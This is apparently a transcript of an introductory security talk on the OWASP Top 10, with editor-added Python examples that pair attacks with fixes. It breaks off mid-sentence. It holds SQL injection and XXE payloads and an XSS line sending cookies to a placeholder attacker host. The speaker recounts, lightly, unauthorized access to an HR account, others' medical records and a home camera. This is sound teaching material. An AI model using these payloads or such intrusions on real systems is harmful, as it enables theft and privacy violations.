
Hacking the OWASP Top 10: An Intro to Web Application Security

BSides Denver · 2020 · 56:51 · Published 2020-10
Category: Technical
Difficulty: Intro
Style: Talk
About this talk
An introductory walkthrough of the OWASP Top 10 most common web application vulnerabilities, including injection attacks, broken authentication, sensitive data exposure, security misconfiguration, cross-site scripting, and logging gaps. The talk covers practical examples of each vulnerability class and demonstrates how attackers exploit them, emphasizing the importance of secure development practices and detection capabilities.
Original YouTube description:
From the OWASP site: "The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications." In other words, it shows the budding application hacker the most common vectors to attack. Join me as we step through the Top 10 most common ways of attacking applications. Complete with examples for each of the 10 items with an added bonus for testing your skills at the very end.
Transcript (en):

Since I don't see anybody complaining, I'll assume you all can. All right, well, welcome to Hacking the OWASP Top 10, also known as An Introduction to Application Hacking. For those of you who don't know me, here's sort of a bio, if you will; nothing particularly exciting on it. I will say this presentation is oriented for beginners. If you have a background in application hacking, you could probably give this presentation better than I can. Lots more information is available in the reference notes at the end of the slides. I'm not going to go through everything here; this is, like I said, just an introduction,

kind of a wet-your-whistle, if you will. I do have Discord up, so if you want to type in questions as I'm talking, feel free; I'll keep an eye on it. Now for some disclaimers. Of course we always have to have disclaimers. This presentation is my opinion only; it has nothing to do with my employer or anybody. Each one of these slides I'm going to go through is a presentation in itself. I mean, in the very first slide I talk about injections; literally you could have a day-long class on that. So, like I said, this is just sort

of to get your feet wet. I'm maybe using some terms in here that are unfamiliar to some of you, especially if you are new to the industry or to application hacking. Most of these things are discussed in the slides at the end, but once again, ask a question and I'll see what I can do about answering it. For those of you that are hoping to see dirty laundry from a company or from a website, sorry, you're not going to see any of that; it would not be responsible disclosure on my side. But you will hear some stories. You're also only going to get pictures; there's nothing live in here, primarily because I tend to have really

bad success with live stuff, and like I said, you don't have the time to sit and watch me type these things in in real life anyway. I'm also not going to talk about how to avoid and fix these; that's a completely different training presentation. So with that, if you are getting into this or interested in getting into this, you might want to know, well heck, where do I start? Well, there's hundreds of programming languages and millions of computer programs; there's like billions of things with computer programs running on them. So you've got plenty of things to aim at. The other really good news is everything you need is already there.

Like I have on the screen for this, I just used a handful of real simple tools, all of which you can download. Now people have different opinions on this depending upon who you talk to. Some like Kali, some like Parrot, some like Pentoo, some like Windows. Again, it doesn't really matter; you can do this sort of application hacking with just about anything. Get yourself some starting tools: Burp Suite, nmap, the OWASP Zed Attack Proxy, there's Metasploit, welsh. And again, all these terms, if they're unfamiliar to you, you can take a look at the slides. I'm happy to send them to whoever's interested. All this information, URLs, all that sort

of great stuff is also in this. However, probably the most important thing for a beginner to download and start playing with is a product or program called WebGoat. It's from OWASP. You're going to hear me talk a lot about OWASP today. It is a worldwide not-for-profit organization that basically does everything around application security. They have their Top Ten lists, which in this case is the top ten most frequently encountered web application security risks. They interviewed hundreds and hundreds of these and put together a list, and that's the list that I'm going to use and show you how you can hack the most common vulnerabilities out there. Another way of looking at it is, this is how you can

test your skills without being visited by the FBI, which is usually a good thing. Again, here's the information if you want to download it and run it yourself. If you want to do application hacking, you're going to need to learn some stuff. You're going to need to learn programming languages and operating systems. Do you need to learn all this stuff at once? No. Do you even need to learn this stuff? You can argue either way on this, but I look at it as: if you don't have a background in this sort of stuff, it's just like not knowing how a computer works. You can still hack it, but knowing how a computer works, how

networks are hooked up, the protocols that go across it, all this sort of stuff makes you a better hacker. It gives you more capabilities. And when it comes to programs, if you know how the programming language works, then you understand how the code works. If you're familiar with a couple of frameworks, you know how these programs and applications are cobbled together to make a system, and yes, they are cobbled together to make a system. If you understand the protocols, then you can kind of pick and choose; you can see, well, FTP does things this way, so maybe if I try it in this fashion over here I can get some information. So the more you know, the better.

So with that, I will get into the actual most frequently encountered web security risk, which is called an injection. Now, at the very beginning of all these slides I have my definition of that, which is: input that causes unexpected behavior. OWASP has another, much more wordy version of that; if you're interested, you can take a look at this. But basically, this is the equivalent of a username and password, and I put in a username of smith' or 1=1 -- . Obviously that's not an employee; I just put in random text for what they call the authentication TAN,

and when I did that it gave me a list of all the users in the database. Now this is not unique to WebGoat. I have done effectively this exact same thing in multiple applications, and it gives me the entire user list. It seems kind of odd: why does that particular phrase, smith' or 1=1 --, dump the database for me? Yep, just like that. Like I said, this is called an injection attack, and this is one of the reasons you need to understand how coding and protocols work, because that's how you figure out how this SQL injection attack works. Oh, and by the way, I'm sorry if you're a

NoSQL sort of person; you still have the same problems in a NoSQL database as well, it's just a slightly different attack. And it doesn't matter what version of SQL you're using, whether you're using Microsoft's or you're using Oracle's or you're using Postgres or MySQL, they all have the same problem. And what it really boils down to is, I'm hoping everybody can see my mouse here, the very first thing, it has this funky-looking thing, and that's how programmers put stuff together: they build things out of other pieces. And when you get yourself your normal data, it's where last name is smith and the authentication TAN is that

number. It goes out into the database and pulls that information, and it just pulls a single one, because you should only have one smith with that particular authorization. But if you use this specially crafted phrase that I've been using, smith isn't that important; you could use smith or sternberger or harry or ralph or whatever you want. It's the last two pieces that are important. The or 1=1 tells the SQL program, or the database, that everything is true, and I'll explain why that's important here in a second. The dash dash is a SQL comment that just says ignore everything after the dash dash. So you put that all together and what you end up with is

select everything from employees where everything is true, so it gives you the entire list of the employees. Again, this is why you have to know programming languages, so you can understand how these quirks and stuff work. Now, it's really easy to avoid these, especially SQL injection attacks. Pretty much every modern language that you could mention has ways around it, has things you can do to prevent it. So why is this one of the more common ones out there? Is it because developers are lazy? Is it because they're dumb? Well, no, that's actually not the reason. You may occasionally find a developer out there who is unfamiliar with this, doesn't know how to do it in their particular language,

but the reason these things are so frequent has very little to do with the actual developer. But we'll get into that later. Let's see. Okay,
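Editor's added example, not code from the talk or from WebGoat: the query-building quirk the speaker walks through, reproduced in Python against an in-memory SQLite table. The employee rows and TAN values are constructed for this example. The vulnerable function glues the submitted last name and TAN into the SQL text, so the payload smith' or 1=1 -- rewrites the WHERE clause exactly as described; the second function binds the same values as parameters and the payload matches nothing.

```python
import sqlite3

# Constructed sample data for the example (not WebGoat's data).
EMPLOYEES = [
    ("Smith", "1234"),
    ("Jones", "5678"),
    ("Sternberger", "9012"),
]

# The payload from the talk: close the quoted string, OR in an always-true
# condition, comment out the rest of the query.
PAYLOAD = "Smith' OR 1=1 --"


def _open_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE employees (last_name TEXT, auth_tan TEXT)")
    conn.executemany("INSERT INTO employees VALUES (?, ?)", EMPLOYEES)
    return conn


def lookup_vulnerable(conn, last_name, auth_tan):
    """User input becomes part of the SQL grammar: the quote in the payload
    ends the string literal and the rest is parsed as SQL."""
    sql = (f"SELECT last_name FROM employees WHERE last_name = '{last_name}' "
           f"AND auth_tan = '{auth_tan}'")
    # With PAYLOAD this is:
    #   ... WHERE last_name = 'Smith' OR 1=1 --' AND auth_tan = 'junk'
    # i.e. "select everything from employees where everything is true".
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, last_name, auth_tan):
    """Bound parameters: the driver sends the values separately from the
    query text, so the payload is compared as a literal string."""
    sql = "SELECT last_name FROM employees WHERE last_name = ? AND auth_tan = ?"
    return [row[0] for row in conn.execute(sql, (last_name, auth_tan))]


def demo():
    conn = _open_db()
    return {
        "normal": lookup_vulnerable(conn, "Smith", "1234"),
        "injected": lookup_vulnerable(conn, PAYLOAD, "junk"),
        "parameterized": lookup_parameterized(conn, PAYLOAD, "junk"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:14s} -> {rows}")
```

The "normal" lookup returns the single Smith row, the injected lookup returns every employee, and the parameterized lookup returns nothing for the same payload. The same pattern (string concatenation versus bound parameters) is what the speaker means by "every modern language has ways around it".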

I'm being abused here on the Discord channel. Anyway, the second one is broken authentication. Basically, it's not properly validating the user. One of my favorite areas of broken authentication are those security questions: what's your mother's maiden name, what school did you go to, stuff like that. Because all you need is a little bit of OSINT and you can figure it out. Story time. I was actually poking around on a school site, I won't say which school, and I noticed that it had these security questions. Well, I happen to know the email address of the HR person because I had actually applied for a job there, and just out of curiosity I tried to log

in as her, and it came up and had a couple of questions there, like mother's maiden name, what's your favorite color, that sort of stuff. And since I was kind of bored at the time, I went over to Facebook and I did a little research on this person, and sure enough there was her mother, and her mother's name and her mother's maiden name. She had posts in there about what her favorite colors were, stuff like that. Okay, just out of curiosity I typed that in, and sure enough, the program let me in. I had access to her account. Because they set it up improperly, even though she was only in HR she had admin privileges, so I was able

to wander around on pretty much any computer I wanted to. This sort of made me nervous, because I was just sort of doing this as a lark, so I reached out to the school and let them know about this sort of stuff. But security questions are completely useless when it comes to authentication. The other one you run into is, we all know passwords are bad; passwords are easy ways to get in. But sometimes it's hard to convince projects of this. So here's a little nmap command that does a brute-force password attack against a particular machine and port. Another story: I had a project that rejected my

claim that they needed to enforce a password policy. So I ran this and then demonstrated to them that out of the three or four thousand accounts they had there, I could get into something like 500 of them, because they used passwords like password1, football team, Broncos, that sort of stuff. So they realized that was a good idea and changed their password policy. Then I ran it again and demonstrated to them that I could do a brute-force attack and nobody would notice me, because they didn't have any thresholds set up. So then they did that. So then I ran it a third time and demonstrated to them

why you needed to use multi-factor authentication, because it didn't matter how good or how complex your passwords were; if I used a powerful enough machine, I could spend the time, figure out what the password was and get in that way. So it took three times, but eventually I convinced them that they needed to use multi-factor authentication. The third one is sensitive data exposure. This is basically showing things to the user, or the hacker, that you really shouldn't show them. Now what you're seeing here on the right, well, you've got the login screen for WebGoat, but on the right you're seeing the result of something called Burp Suite. Burp Suite is probably one of the more

useful tools for application hacking. What Burp Suite does is it sort of gets between the user, i.e. the login page for WebGoat, and the server in the back end. For those of you that are unfamiliar with the machine in the middle, that's effectively what it looks like. I'm intercepting what WebGoat is sending to the server, and what it's sending is this HTTP POST request. There's lots of interesting information in here; again, if you do application hacking, you'll learn about all this stuff. The important things are things like the session IDs for the cookies. Go up here: the Origin can be played with. I have examples of that; we actually

won't go through it today, but it's at the end of the slide deck, where you can play with the Origin header. If you get hold of the session cookie, you can do replay attacks; you can pretend to be somebody else and do things under their account. Really neat things like that. But the important thing here is you'll notice, oops, went a little too far, there we are, down here on the bottom: username is webgoat and the password is webgoat, in plain text. They didn't even bother to encrypt it. So that's an example of showing things that you really shouldn't be showing. By the way, if you happen to be using FTP,

by default FTP sends passwords in plain text, which is why you shouldn't be using FTP. XML external entities. I keep warning you, you need to learn programming languages; XML is one of them, although a lot of places use JSON now. JSON also has weaknesses as well; I just happen to be using XML here because it was easier. So here is another WebGoat page, and it's sort of like a Discord-type channel, and then over here, if I type in junk and press submit, this is what is sent from the client to the server. You'll notice it says it's XML, it's got a comment, the comment's text looks fairly innocuous.

The other thing you can do in Burp Suite, which makes Burp Suite very useful, is you can change it. So what I did is I went in and stuck in this DOCTYPE user root SYSTEM file thing, and basically what it does is it runs this HTTP command as a system instead of actually typing in the word junk, because I took junk out. Now if you do this and then you continue sending it to the server, what the server will happily give you is the root file system of the computer I'm actually running on, because it didn't validate this XML information, and far too many programs have that same problem as well.

So that's one of those things that if you see it has XML on it, you can try this sort of attack and see if it lets you in.
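Editor's added example, not code from the talk or from WebGoat: the shape of the DOCTYPE/SYSTEM payload the speaker injects into the comment body, beside the check a server should run before handing client XML to a parser. The payload bytes and the comment format are constructed for this example; the entity name and element names are assumptions. Rejecting any DTD up front removes every entity declaration, internal or external, before the parser sees it, which is the same idea as the defusedxml library's DTD-forbidding parsers. Python's own xml.etree does not fetch external entities, but Java's JAXP parsers, for instance, will resolve a SYSTEM entity unless that is switched off, which is how the file system listing ends up in the response.

```python
import re
import xml.etree.ElementTree as ET

# Constructed payload in the shape the talk describes: a DOCTYPE declaring an
# external entity that points at the file system, referenced where the
# comment text used to be. (Entity and element names are assumptions.)
XXE_PAYLOAD = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE comment [<!ENTITY root SYSTEM "file:///">]>'
    '<comment><text>&root;</text></comment>'
)

# What the same request looks like when the user really typed "junk".
BENIGN = '<comment><text>junk</text></comment>'

# A DTD can only appear in the prolog, but matching anywhere fails closed
# (a CDATA section containing the literal string is rejected too, which is
# the safer error).
_DOCTYPE = re.compile(r"<!DOCTYPE", re.IGNORECASE)


class UntrustedXMLError(ValueError):
    """Raised when client XML carries a DTD and is refused unparsed."""


def parse_untrusted(xml_text):
    """Parse XML from a client, refusing any document that declares a DTD.

    No DTD means no entity declarations at all, so there is nothing for a
    resolver to fetch from file:// or http://.
    """
    if _DOCTYPE.search(xml_text):
        raise UntrustedXMLError("DOCTYPE/entity declarations are not accepted")
    return ET.fromstring(xml_text)


def comment_text(xml_text):
    """The value the application actually wanted: the <text> element."""
    return parse_untrusted(xml_text).findtext("text")


def is_rejected(xml_text):
    """Convenience wrapper so the outcome can be checked as a boolean."""
    try:
        parse_untrusted(xml_text)
    except UntrustedXMLError:
        return True
    return False


if __name__ == "__main__":
    print("benign  ->", comment_text(BENIGN))
    print("payload ->", "rejected" if is_rejected(XXE_PAYLOAD) else "parsed")
```

The check is deliberately dumb: it does not try to tell a harmless internal entity from an external one, because a parser that needs DTDs from untrusted clients is the exception, and the parser's own settings (disabling external general and parameter entities, and DTD loading) remain the primary control.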

Okay, I see, any questions? No, still more hassling. And I warned you at the very beginning I have squirrel moments, and here is a squirrel moment. I've been talking about application hacking, and the thing that's important for you as the hacker is to figure out why you're doing it. Hacking, quite frankly, can be, if you don't have permission to do it, technically it's wrong, illegal and dangerous. There, I've said it. But the thing is, hacking can also be a good thing. Now I will freely admit, in my adventures in hacking, and I am by no means a professional hacker, I am not a red teamer, I'm probably closer to a blue

teamer, I've seen interesting things. Ran into a place where they kept pictures; people didn't actually realize their pictures were being copied and uploaded to this S3 bucket. We'll just say there are people who take pictures of things that they really shouldn't be taking pictures of. Very disturbing, and I have been psychically scarred for life. But probably my favorite story is a number of years ago, when people started hacking video cameras, I ran a Shodan, and I'll explain what Shodan is here in a little bit, and I just kind of poked around, and I got to watch a video camera in Russia where they were building something, and that was kind of neat, and

saw another video camera where, as far as I could tell, they were watching a trash can. Seemed a little weird to me, why would you watch your trash can, but whatever. And then I happened to find a video camera that was into somebody's house, and I was able to rotate the camera, and I was like, oh, I can rotate the camera, this is neat, and there was a couple sitting there and they were watching TV. So I rotated the camera and I was watching TV, Spider-Man 3 ironically enough, with them. And it occurred to me that's a little bit disturbing: here I am,

hacked into somebody's house, watching their TV shows. So yeah, it can be a little bit interesting. But on a more serious note, frequently what I'll get is somebody will reach out to me, or they'll go through the appropriate channels in the company, and they'll say, I broke into your web application, here's the stupid stuff that you did. Kind of a nanny-nanny-nanny sort of a thing. That will not go over well. Now if you're a developer, you've spent weeks, months, possibly even years working on these programs. You've devoted a lot of time and effort, and having somebody basically do a nanny-nanny, I broke in, you're not going to react well to that.

And frankly, that's even assuming you even find out about it, because when you go through some of these things, you reach out to the security team, or at least the email that has the security team in it, you may not actually be reaching any of the developers. This may go directly to the legal department, and the legal department will send you a cease and desist message. Yes, I've had a couple of them. And it never even gets to the developers. So you kind of have to be careful about this sort of stuff. Yeah, you might find a vulnerability, but that doesn't necessarily mean anyone's actually ever going to get to fix it.

Now, if you're a defender out there, why do I care about hacking as a defender? Other than the obvious thing, somebody got in: quite frankly, if you don't know how they got in and you can't duplicate it, how are you going to fix it? So this is one reason that I tend to get really, and I probably have talked longer on the subject than I needed to, I get really excited about the whole concept of red team do red team, blue team do blue team, because I think it's a wasteful and bad separation. But, sorry, you're getting my opinions here; what can I say. But it boils down to one thing: if you do

hack, try not to do evil. So back to your regularly scheduled program. The fifth one is broken access control. Basically what this means is the assumption is, if the user is able to log in, then that means the user can do anything. Well, here's one way to check to see if that flaw is in a program. So here we have a URL, and it happens to go to this particular SQL injection page for WebGoat. Well, I went in and I modified it to go to a different web page, and it let me, no problems at all. So you might be asking yourself, well, this is WebGoat, you're supposed to be able to look at all these lessons, what's

the big deal, why would I care about being able to modify a URL? Well, what if the URL was a medical system and it was doing something like showing you patient records? This actually is a real-life example; everything's been changed to protect the guilty. This is how the developers went and got my medical records. I took a look at this and I noticed that my medical records were, interestingly enough, sequential. It was page number 12345, the next one was 123456, and so on. So there was this nice sequential thing in there, so

just out of curiosity I put in a number that didn't belong to me, and sure enough I was able to pull up somebody else's medical records. The other thing you can do with that information, if you notice it's sequential, is you can put in a little loop, because fetching these patient records takes time, takes resources, so you can quite easily overload a server doing this and have quite a nice little denial-of-service attack. Well, I guess it's nice for you, probably not so nice for the medical system. And again, this is one of those sorts of things that when I stumbled across it, it was in my own medical records, and I sent this

to the, I actually happened to know who the developers were, so I went directly to them and I said, hey, I ran across these sorts of things. The simplest thing to do is don't use sequential page numbers. Oh, sorry, I'm not supposed to get into fixing this. The next one is security misconfigurations. I view this as: it's when you lock the door but leave the window open. Cloud environments. Now I'm going to pick on AWS here, basically because at the last job AWS is what they used, but Azure has the problem, Google Cloud has the same problems, and a lot of it boils down to, one, not understanding your security configurations, and then two, your boss comes in

and says, okay, you need to migrate this up to the cloud, you have two weeks to do it. Okay, you're not really going to spend a whole lot of time figuring out how all this stuff works; you're just going to try to get it up there as fast as possible. So what we have here is an AWS command-line program, and I'm telling it to look at all the S3 buckets, or excuse me, use the S3 commands, ls. For those of you that are in Linux, you know what ls is; if you're not in Linux, ls is the same thing as a directory listing. And here's a bucket name, and I actually tested this on my AWS

buckets, and sure enough it came up and said, okay, here's everything in the bucket, which is perfectly good, because I had logged in as myself. Well, then I tried a couple of other buckets, and I was able to take a look at those even though they were, shall we say, not my buckets. And it came back and said, okay, here's the name of the bucket, here's the files on it, here's the size. There's actually a lot more information that comes back with this that I'm not putting in here. Well, okay, I suspect that Joe Company probably didn't want me to take a look at their S3 buckets. What is it that they did wrong?
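Editor's added example, not code from the talk: a check for the misconfiguration the speaker goes on to describe, the bucket ACL grant to "Authenticated Users". The sample ACL is constructed here in the shape that aws s3api get-bucket-acl --bucket NAME prints; the canonical IDs are placeholders. The two group URIs are AWS's real well-known groups: AllUsers is anyone on the internet, AuthenticatedUsers is anyone who can sign a request with any AWS account, which is exactly what lets an outsider run aws s3 ls against someone else's bucket (READ on a bucket is the list permission).

```python
import json

# AWS's predefined global groups, as they appear in ACL grantee URIs.
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTHENTICATED_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"

# Constructed sample in the shape of `aws s3api get-bucket-acl` output.
# The owner ID is a placeholder, not a real canonical user ID.
SAMPLE_ACL = json.dumps({
    "Owner": {"ID": "owner-canonical-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"},
         "Permission": "FULL_CONTROL"},
        # The mistake from the talk: "authenticated" sounds like "our users",
        # but this group is every AWS account in the world.
        {"Grantee": {"Type": "Group", "URI": AUTHENTICATED_USERS},
         "Permission": "READ"},
    ],
})

# The same bucket after the grant is removed: only the owner remains.
LOCKED_DOWN_ACL = json.dumps({
    "Owner": {"ID": "owner-canonical-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"},
         "Permission": "FULL_CONTROL"},
    ],
})


def public_grants(acl_json):
    """Return (who, permission) for every grant to a global group.

    READ lists objects, WRITE creates/deletes them, READ_ACP/WRITE_ACP read
    or rewrite the ACL itself, FULL_CONTROL is all of the above; any of them
    granted to a global group is a finding.
    """
    acl = json.loads(acl_json)
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") != "Group":
            continue
        uri = grantee.get("URI", "")
        if uri == ALL_USERS:
            findings.append(("anyone, unauthenticated", grant["Permission"]))
        elif uri == AUTHENTICATED_USERS:
            findings.append(("any AWS account", grant["Permission"]))
    return findings


if __name__ == "__main__":
    for label, acl in (("sample", SAMPLE_ACL), ("locked down", LOCKED_DOWN_ACL)):
        print(f"{label}: {public_grants(acl) or 'no global grants'}")
```

ACL grants are only one of the ways a bucket ends up listable by strangers; a bucket policy with "Principal": "*" has the same effect, so a real audit reads both, and the account-level "Block Public Access" setting is the backstop that overrides either.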

Now, the typical thing is there is a user, excuse me, a role, there we are, a role called Authenticated User. Most developers look at this and say, oh, Authenticated User means that somebody's logged into our AWS account and they're an authenticated user for our AWS account. Well, that's not what that means. What that means is I have logged in as an AWS user, not for the company, but any AWS. This is a fairly common one. Most of the time you get an Authenticated User, you do start listing bucket names, and in the documentation, or in the notes here, I have some ways of getting bucket names if you don't happen to know

it. And you can pull all this information out, and it's because things were misconfigured; the developer didn't have the time to figure it out, and quite frankly the AWS documentation, while it's very voluminous, is not particularly good in some situations, and describing this was one of them. Cross-site scripting. This is another really fun one that you as an application security hacker can have way too much entertainment with. You'll notice that there is a little pop-up here that says fred. Okay, that's very exciting. You go down a little further and you see I put in this JavaScript command, script alert script, into an actual entry field. The entry field is supposed to be a

series of numbers; obviously the field wasn't being validated. But why the heck did it run the JavaScript code? Well, that's because this code is sent to the browser. The browser is what actually invokes this command, not the server and not the client. So it sort of steps outside of the client-server boundary, if you will, and actually executes the JavaScript code. Now there's three different types of cross-site scripting: there's reflected, which is what this is, there's stored, and there's DOM, Document Object Model. Again, more information in the slide decks, which we won't go over today. Now of course, as an attacker you're not going to use alert.
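Editor's added example, not code from the talk or from WebGoat: the reflected case the speaker shows, modelled as a server-side Python template that echoes a numeric field back into the page. The page markup is constructed for this example, the pop-up text is the talk's "fred", and attacker.example is a placeholder host. The vulnerable renderer pastes the value into the HTML, so the browser parses and runs the script tag; the escaped renderer turns the same input into inert text; the validated renderer refuses it outright because the field is supposed to hold digits.

```python
import html

# Payload from the talk: a script tag typed into a field meant for numbers.
PAYLOAD = "<script>alert('fred')</script>"

# The shape of a real attacker payload (placeholder host): instead of an
# alert, ship document.cookie to a server the attacker controls.
COOKIE_THEFT = ("<script>new Image().src="
                "'https://attacker.example/c?'+document.cookie</script>")


def render_vulnerable(value):
    """The submitted value is pasted straight into the page, so the browser
    sees a real <script> element and runs it (reflected XSS)."""
    return "<p>Lesson result: " + value + "</p>"


def render_escaped(value):
    """html.escape rewrites <, >, &, " and ' as entities; the browser shows
    the text but never sees a tag."""
    return "<p>Lesson result: " + html.escape(value, quote=True) + "</p>"


def render_validated(value):
    """For a field that is only ever meant to hold digits, reject anything
    else before it reaches the template, and still escape on output."""
    if not value.isdigit():
        raise ValueError("amount must be digits only")
    return render_escaped(value)


def contains_script(page):
    """True if the rendered page still carries a live <script> tag."""
    return "<script" in page.lower()


if __name__ == "__main__":
    for name, fn in (("vulnerable", render_vulnerable), ("escaped", render_escaped)):
        page = fn(COOKIE_THEFT)
        print(f"{name:10s} live script? {contains_script(page)}")
        print("  ", page)
```

Escaping is context-specific: html.escape is right for element text and quoted attribute values, but a value dropped inside a script block, a URL, or an unquoted attribute needs a different encoder, which is why the reliable fix is a templating engine that escapes by default rather than hand-placed escape calls.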

You're going to dig through the HTML form and look for something like this, where they're putting parameters directly into a value. Then you're going to modify that parameter, and you might do something like document.cookie. And so you do that, and that information gets sent back to your website, and you have the cookie that's part of the web page. Why is that useful? Again, session IDs are used in replay attacks; you can log in using a cookie, you can log in and pretend to be somebody else. One of the common things that cross-site scripting is used for are pages where you buy things, shopping

carts, stuff like that. You get somebody's session ID and you basically can be them; you can purchase stuff under their account, you can use their credit card, and they won't know a thing about it until they get a bill. So cross-site scripting is one of the more dangerous ones out there, because you can literally do anything in the script that you can do in JavaScript, and since JavaScript is an entire program, you have access to literally an entire programming language where you can run anything you want. Insecure deserialization. That sounds like a really impressive one. Basically, what it is is: serialization is the process of taking

an object in memory as the program is running and saving it onto disk. It's sort of like taking a snapshot of the program; you can think of it that way. And then later on the program will load up that snapshot and take off from where it was left off. A great time saver, useful for things like: I want to stop the program here and then come back to it at a later date, and I want to pick up wherever I left off. So, a very typical use case. But the problem is you can go in and you can change that binary data. There's one example

here of how you can change it in a Java program. I won't step through how this Java program works, but what it ends up doing is a very nasty denial of service, because this is in effect an infinite loop. So your program will happily try to read this; it will continue reading, it will use up all memory, it will probably start writing stuff to disk, possibly using everything up on your disk, which is not good in a Linux system, to say the least. So horribly bad things happen, we'll just put it that way. Well, for those of you that are programmers, you may be looking at this and go,

ah, nobody uses Java, Java is bad code, we don't use Java, we'll use something safe like YAML. Well, bad news: you can do the same thing with YAML. Just as a side note, you'll see most of the time that I might pick on a particular language, whether it's Java or SQL or pretty much anything out there. All languages have these issues. I don't care whether you're using Python or Ruby or assembly or C or insert language here, they all have their issues; different issues, but they all have issues. So the fact that I have an example here in Java is solely because that's what I happen to have. Given enough time, I could come up with

one in, pick your language. So like I said, here's your safe language, YAML; you can do the same thing. The problem with this particular YAML code is this thing here, load. load will take whatever it's told to and happily load and run it. A year, maybe two years ago, YAML realized that was probably a bad thing, and they changed it to safe_load, which is what you're supposed to be using. That's great, so anyone that's aware of that who's writing new code probably is immune to this. However, there's thousands, if not millions, of lines of YAML code out there that hasn't been updated, hasn't been fixed,

and suffers from this exact same problem. If you think back to one of the earlier screens I had, as an application hacker you have more real estate that you can go after than you can possibly imagine. And I have even gotten into the whole IoT thing, and the fact that IoT tends to use very old and very antiquated code and doesn't keep it up to date. So yeah, there's just so much to aim for in the application security field; you could easily spend your life and only hit just a small portion of it. As a side note, these deserializations are also frequently used by cryptominers, because what they'll do is they'll sort

of add their binary code to the end of the deserialization code, so your stuff comes up, runs perfectly, you don't notice anything, because it acts just like it is supposed to. But in the background a thread or another process has been started up and it's happily doing crypto mining. So that's something you have to also be careful about, and again, in the slide deck I have some examples of where that has been used before. Using components with known vulnerabilities. I sort of alluded to this in some previous discussions, but things don't get changed frequently in the programming world, or they get changed very frequently in the programming world, sort of depends on

which side you're looking at. We're all familiar with open source. As a developer, open source is great: I can get this open source, I can save myself all sorts of time and effort and get things done at a faster rate. Now, just to give you an idea of the scope of this concept of open source, I got a little blurb here. A company called Black Duck, which scans open source components and stuff, looked at 1,100 commercial code bases. This was back in 2017, so that's three, four years old now. And they discovered that 96% of the applications they scanned had open source components, and

of those 96%, the average was 257 components, or pieces of open source, for each application. So just sort of think of that from a scope standpoint: 96% of the programs you run into have 250 open source components. I can pretty much guarantee you the 250 open source components are not kept up to date. Some of them will have vulnerabilities in them, some are no longer maintained, some of them the developers have gone on to bigger and better things. So it's just code that's been out there. I mean, I've seen code as old as the 90s that's still running inside of programs. Again, a big area for you to attack.
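Editor's added example, not code from the talk: the smallest useful version of the check the speaker's 257-components-per-application figure calls for, a manifest of pinned dependencies compared against a table of affected version ranges. Both the manifest and the advisory table are constructed for this example; the package names and ranges are placeholders and no real advisory or CVE is being asserted. Versions are compared as integer tuples, not strings, because "2.10.0" sorts before "2.9.0" as text.

```python
# Constructed advisory table: package -> list of (first_affected,
# last_affected) inclusive ranges. Placeholder names and ranges only.
ADVISORIES = {
    "examplelib": [("2.3.0", "2.3.32"), ("2.5.0", "2.5.10")],
    "oldparser": [("0.0.0", "1.4.9")],
}

# Constructed manifest in pip-freeze style (name==version per line).
MANIFEST = """\
# pinned dependencies
examplelib==2.3.15
oldparser==1.5.0
requestsish==2.24.0
"""


def parse_version(text):
    """Turn '2.3.15' into (2, 3, 15) so comparisons are numeric per field."""
    return tuple(int(part) for part in text.strip().split("."))


def parse_manifest(text):
    """Map lowercase package name -> pinned version string."""
    deps = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "==" not in line:
            continue
        name, version = line.split("==", 1)
        deps[name.strip().lower()] = version.strip()
    return deps


def vulnerable_components(manifest_text, advisories=ADVISORIES):
    """Return (name, pinned_version, affected_range) for every pinned
    component whose version falls inside an advisory's affected range."""
    findings = []
    for name, pinned in parse_manifest(manifest_text).items():
        version = parse_version(pinned)
        for low, high in advisories.get(name, []):
            if parse_version(low) <= version <= parse_version(high):
                findings.append((name, pinned, f"{low}-{high}"))
    return findings


if __name__ == "__main__":
    for name, pinned, affected in vulnerable_components(MANIFEST):
        print(f"{name}=={pinned} is inside affected range {affected}")
```

In practice the advisory table comes from a feed (OSV, GitHub's advisory database, a vendor scanner such as the Black Duck tool the speaker cites) and the manifest is a lockfile, but the comparison is the same, and it is the comparison that silently goes wrong when versions are compared as strings.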

um a great example of not keeping things up to date is the whole equifax mess um i'm sure there are i'm sure most everybody here is familiar with equifax just in case you're not it happened in 2017 um and because they were using apache struts and there was a particular a vulnerability out there that you know they didn't get patched somebody or someone or china or you know take your pick who you think it was they got the private records for 148 million americans 15 million british citizens and 19 000 canadian citizens uh quite the impact to say the least and this was because uh somebody didn't keep their apache struts up to date now there's lots of

discussions as to whose fault it was and all this sort of thing, which we're not going to get into here. This is just an example to show you that even in the biggest of companies things don't get kept up to date. Now, if you've heard of the Heartbleed vulnerability, this was maybe three, four, five years ago, something like that. It was a very nasty vulnerability that was found in some open source code known as OpenSSL. Five years later, six years later, if you run this Shodan list of devices you'll find a bunch of them that are still vulnerable to Heartbleed. Now for those of you that are

unfamiliar with Shodan, it's a search engine that basically goes out and scans webcams, routers, servers, programs, everything, and you can search for various things. This one in particular is searching for Heartbleed vulnerabilities; you can say search for web cameras in the US that are made by a Chinese company, so you can get very specific and it'll give you a list of all this stuff. Now again, I sort of talked about this a little earlier, and a lot of people take a look at or hear these sorts of things and think, well, the problem is lazy developers, developers aren't keeping things up to date, it's all the

developers' fault. Well, I'm a developer, I sort of take offense at that, but in reality, even updating something like Apache Struts, which is a fairly well-known application... Let's say you find that an application or open source component that you're using is no longer maintained: somebody has to write it. Let's say you do update, you do keep everything up to date. It's not unusual that you will update something to a new version and your program stops working, your program breaks. So then you have to stop your development, you have to stop getting things done in order to fix it. The example I've used before when describing this to people that think it's all the

